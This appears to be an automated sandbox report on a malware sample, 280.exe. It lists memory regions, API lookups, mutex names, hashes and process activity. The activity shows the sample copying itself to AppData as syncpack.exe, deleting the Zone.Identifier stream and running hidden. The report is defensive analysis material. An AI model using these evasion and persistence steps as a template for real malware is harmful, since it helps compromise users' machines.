pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
private_0x00000000001a0000 0x001a0000 0x001affff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001bcfff Private Memory Readable, Writable, Executable True False False -
private_0x00000000001c0000 0x001c0000 0x001ccfff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0027ffff Private Memory Readable, Writable, Executable True False False -
pagefile_0x0000000000280000 0x00280000 0x00287fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0039ffff Private Memory Readable, Writable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
locale.nls 0x00420000 0x00486fff Memory Mapped File Readable False False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000550000 0x00550000 0x006d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006e0000 0x006e0000 0x00860fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000870000 0x00870000 0x01c6ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c70000 0x01f3efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb44
192 0
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1 Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1 Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1 Fn
System Get Time type = Ticks, time = 192162 True 3 Fn
System Get Time type = Ticks, time = 192177 True 87 Fn
System Get Time type = Ticks, time = 192193 True 66 Fn
System Get Time type = Ticks, time = 192208 True 22 Fn
System Get Time type = Ticks, time = 192224 True 71 Fn
System Get Time type = Ticks, time = 195672 True 1 Fn
System Get Time type = Ticks, time = 195687 True 4 Fn
System Get Time type = Ticks, time = 195703 True 12 Fn
System Get Time type = Ticks, time = 195718 True 11 Fn
Mutex Create mutex_name = PEMA08 True 1 Fn
Mutex Create mutex_name = PEMB40 True 1 Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, size = 260 True 1 Fn
System Get Time type = Ticks, time = 195734 True 1 Fn
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, os_pid = 0xb50, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1 Fn
Process #4: 280.exe
617 0
Information Value
ID #4
File Name c:\users\kft6utqw\appdata\local\temp\280.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:19, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:49
OS Process Information
Information Value
PID 0xb50
Parent PID 0xb40 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB54
0xB58
0xB5C
0xB60
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002c9fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False -
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
pagefile_0x00000000003b0000 0x003b0000 0x003b6fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003c0000 0x003c0000 0x003c1fff Pagefile Backed Memory Readable, Writable True False False -
cversions.1.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
cversions.2.db 0x003d0000 0x003d3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x003e0000 0x003fefff Memory Mapped File Readable True False False -
280.exe 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000520000 0x00520000 0x00520fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
cversions.2.db 0x00570000 0x00573fff Memory Mapped File Readable True False False -
pagefile_0x0000000000580000 0x00580000 0x00580fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000590000 0x00590000 0x0059ffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00837fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x009c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009d0000 0x009d0000 0x01dcffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01dd0000 0x0209efff Memory Mapped File Readable False False False -
private_0x00000000020a0000 0x020a0000 0x022affff Private Memory Readable, Writable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x0217efff Pagefile Backed Memory Readable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x02180000 0x021affff Memory Mapped File Readable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x021b0000 0x02215fff Memory Mapped File Readable True False False -
private_0x0000000002270000 0x02270000 0x022affff Private Memory Readable, Writable True False False -
private_0x00000000022b0000 0x022b0000 0x023affff Private Memory Readable, Writable True False False -
pagefile_0x00000000023b0000 0x023b0000 0x027a2fff Pagefile Backed Memory Readable True False False -
private_0x00000000027b0000 0x027b0000 0x028affff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x743d0000 0x744c4fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x752b0000 0x752c6fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 104.00 KB MD5: bc1a4dc38f3236982d47496a1151f33f, SHA1: d112719238664d7996048614d75db8a67fc50fc5, SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473 False
Threads
Thread 0xb54
405 0
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1 Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1 Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1 Fn
System Get Time type = Ticks, time = 195843 True 31 Fn
System Get Time type = Ticks, time = 195859 True 8 Fn
System Get Time type = Ticks, time = 195874 True 24 Fn
System Get Time type = Ticks, time = 195890 True 63 Fn
System Get Time type = Ticks, time = 195906 True 22 Fn
System Get Time type = Ticks, time = 195921 True 26 Fn
System Get Time type = Ticks, time = 195937 True 29 Fn
System Get Time type = Ticks, time = 195952 True 46 Fn
System Get Time type = Ticks, time = 198183 True 7 Fn
System Get Time type = Ticks, time = 198199 True 8 Fn
System Get Time type = Ticks, time = 198214 True 10 Fn
Mutex Create mutex_name = PEMB40 True 1 Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1 Fn
Mutex Create mutex_name = Global\I78B0A7D7 True 1 Fn
Mutex Create mutex_name = Global\M78B0A7D7 True 1
Fn
System Get Time type = Ticks, time = 198214 True 1
Fn
Mutex Release mutex_name = Global\I78B0A7D7 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
System Get Time type = Ticks, time = 198214 True 18
Fn
System Get Time type = Ticks, time = 198230 True 93
Fn
System Get Time type = Ticks, time = 198246 True 77
Fn
System Get Time type = Ticks, time = 198261 True 3
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
System Get Time type = Ticks, time = 198261 True 57
Fn
Module Load module_name = wtsapi32.dll, base_address = 0x75420000 True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
File Create filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Module Create Mapping module_name = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, process_name = c:\users\kft6utqw\appdata\local\temp\280.exe, desired_access = FILE_MAP_READ True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, type = size True 1
Fn
Module Unmap process_name = c:\users\kft6utqw\appdata\local\temp\280.exe True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
System Get Time type = Ticks, time = 198308 True 1
Fn
File Get Info filename = C:\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\, type = file_attributes True 1
Fn
System Get Time type = Ticks, time = 198308 True 1
Fn
File Move source_filename = C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe, destination_filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe True 1
Fn
File Delete filename = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe:Zone.Identifier False 1
Fn
System Get Time type = Ticks, time = 198558 True 1
Fn
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, os_pid = 0xb64, show_window = SW_HIDE True 1
Fn
Process #5: syncpack.exe
346 0
Information Value
ID #5
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:21, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:47
OS Process Information
Information Value
PID 0xb64
Parent PID 0xb50 (c:\users\kft6utqw\appdata\local\temp\280.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB68
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000260000 0x00260000 0x00267fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00277fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x003affff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000420000 0x00420000 0x005a7fff Pagefile Backed Memory Readable True False False -
private_0x00000000005b0000 0x005b0000 0x006affff Private Memory Readable, Writable True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01c40000 0x01f0efff Memory Mapped File Readable False False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
